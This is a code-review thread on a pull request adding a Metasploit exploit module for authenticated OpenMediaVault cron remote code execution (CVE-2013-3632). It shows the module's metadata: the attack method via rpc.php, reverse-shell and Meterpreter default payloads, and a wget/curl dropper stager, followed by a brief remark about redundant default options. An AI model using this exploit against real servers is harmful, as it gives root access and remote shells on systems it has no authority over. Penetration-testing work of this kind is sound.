modules/exploits/multi/http/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,323 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenMediaVault rpc.php Authenticated Cron Remote Code Execution',
+        'Description' => %q{
+          OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
+          An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
+          a cron entry that runs arbitrary commands as root on the system.
+          All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # Original Discovery
+          'Mert BENADAM' # exploit author
+        ],
+        'References' => [
+          ['CVE', '2013-3632'],
+          ['PACKETSTORM', '178526'],
+          ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632']
+        ],
+        'DisclosureDate' => '2024-05-08',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl'],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80,
```

Comment:
I think these these are already the default values for these two options.
```suggestion
```

Reply:
See https://github.com/rapid7/metasploit-framework/pull/19298/commits/594de4681fedbf42e5fc79b0f30e3b116655fafd.